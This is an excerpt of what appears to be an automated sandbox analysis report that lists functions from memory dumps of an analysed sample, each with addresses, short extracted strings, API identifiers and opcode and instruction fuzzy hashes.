                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD020075600702CBCB24CF29C8E1663B7F2FFA9714B19859DC4864FBA5EB39A452CB50
                                                                                                                                                                                                                                            Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID: ,)*k
                                                                                                                                                                                                                                            • API String ID: 2994545307-1228391949
                                                                                                                                                                                                                                            • Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                            • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                                                                                                                                            Function 024C6E67 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ,)*k
                                                                                                                                                                                                                                            • API String ID: 0-1228391949
                                                                                                                                                                                                                                            • Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                            • Instruction ID: 9832939cc0ca6e4005c5657630c66589d1309634df904c298b50862bafd67e39
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04C1687DA083105BD364DF29C880A3FFBEAABC6714F29992EE58157780D7319C40CB82
                                                                                                                                                                                                                                            Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: m
                                                                                                                                                                                                                                            • API String ID: 0-3775001192
                                                                                                                                                                                                                                            • Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                            • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                            Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID: 167H
                                                                                                                                                                                                                                            • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                            • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                            • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                            Function 024B5BF7 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 167H
                                                                                                                                                                                                                                            • API String ID: 0-2704650348
                                                                                                                                                                                                                                            • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                            • Instruction ID: 68ed794287213f62c57d89f4b2042641088a8b9800cd6093fe2dc976d33dd27b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FD18772A043444BDB15CF298C816EBF792EFC5314F59862EE985873C0D775C906CBA2
                                                                                                                                                                                                                                            Function 024AC921 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: .
                                                                                                                                                                                                                                            • API String ID: 0-1505114982
                                                                                                                                                                                                                                            • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                            • Instruction ID: 81f36312a2ed6ba89055a7637830084efded24017588a7aed2dcd3164ab5f086
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72C105B5D01212CBCB24CF29C8917BBB7B1FF95314F19825ED896AB790E734A941CB90
                                                                                                                                                                                                                                            Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: .
                                                                                                                                                                                                                                            • API String ID: 0-1505114982
                                                                                                                                                                                                                                            • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                            • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                            Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &#
                                                                                                                                                                                                                                            • API String ID: 0-1789715784
                                                                                                                                                                                                                                            • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                            • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                            Function 024B1F77 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &#
                                                                                                                                                                                                                                            • API String ID: 0-1789715784
                                                                                                                                                                                                                                            • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                            • Instruction ID: 96b86d7540c5f77ace728f7c69143a4dcb02229961cbb447936c71c566bc1532
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81A14C71A042105BDB1ADF28CC526BB73E5EF91324F09852EED96DB390E3B4D905C762
                                                                                                                                                                                                                                            Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: .
                                                                                                                                                                                                                                            • API String ID: 0-1505114982
                                                                                                                                                                                                                                            • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                            • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                            Function 024AC528 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: de
                                                                                                                                                                                                                                            • API String ID: 0-2106599819
                                                                                                                                                                                                                                            • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                            • Instruction ID: 237539fc1c8f80e61523eba48e1ed7785010906efede98e614aae4835ec7f1bb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53912271908311CAC324DF68C8E266BB7F2EFA1324F18992EE4D64B391E7788505C792
                                                                                                                                                                                                                                            Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ~
                                                                                                                                                                                                                                            • API String ID: 0-1707062198
                                                                                                                                                                                                                                            • Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                            • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                                                                                                                                            Function 024AD4D7 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ~
                                                                                                                                                                                                                                            • API String ID: 0-1707062198
                                                                                                                                                                                                                                            • Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                            • Instruction ID: 5bc335a9b2116e7bd9f3a38b2fdb064bd79dfa175364076baab1d7d3bead90e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FA12976E042619FC725CE2CCC906ABB7E1AF95324F19823EECA9973D1D7318806C791
                                                                                                                                                                                                                                            Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: RpB
                                                                                                                                                                                                                                            • API String ID: 0-664042118
                                                                                                                                                                                                                                            • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                            • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                                                                                                                                            Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: d1
                                                                                                                                                                                                                                            • API String ID: 0-4211392460
                                                                                                                                                                                                                                            • Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                            • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                                                                                                                                            Function 024A77E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: c$
                                                                                                                                                                                                                                            • API String ID: 0-2516980088
                                                                                                                                                                                                                                            • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                            • Instruction ID: 34d734b052877dbdf523287f9c605fbc5785e0f76673639941e077e5292fae27
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E49199B0101741CFE7648F25C8A0B63BBB2FF56318F19958DC4864FBA1E379A846CB94
                                                                                                                                                                                                                                            Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID: ihgf
                                                                                                                                                                                                                                            • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                            • Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                            • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                            Function 024CD557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ihgf
                                                                                                                                                                                                                                            • API String ID: 0-2948842496
                                                                                                                                                                                                                                            • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                            • Instruction ID: 6b8f5fe0cc72ad51f6b5591bbed2a957451959d292013d7bf185c2e6d6f1656a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3881B178A05201DFD754DF2CC880A6BB7E2EF99714F29953DE5858B3A1DB31E841CB42
                                                                                                                                                                                                                                            Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: "
                                                                                                                                                                                                                                            • API String ID: 0-123907689
                                                                                                                                                                                                                                            • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                            • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                            Function 024BA637 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: "
                                                                                                                                                                                                                                            • API String ID: 0-123907689
                                                                                                                                                                                                                                            • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                            • Instruction ID: 65632e723c189e4064236202250ffe9fae7105dc8b93c79f62f27da13805b71f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8771D432A083658BD7268E3CC48039EBBE2AFC5714F19892FE49497791D335DC46CB92
                                                                                                                                                                                                                                            Function 0043A777 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: w
                                                                                                                                                                                                                                            • API String ID: 0-2991200456
                                                                                                                                                                                                                                            • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                            • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
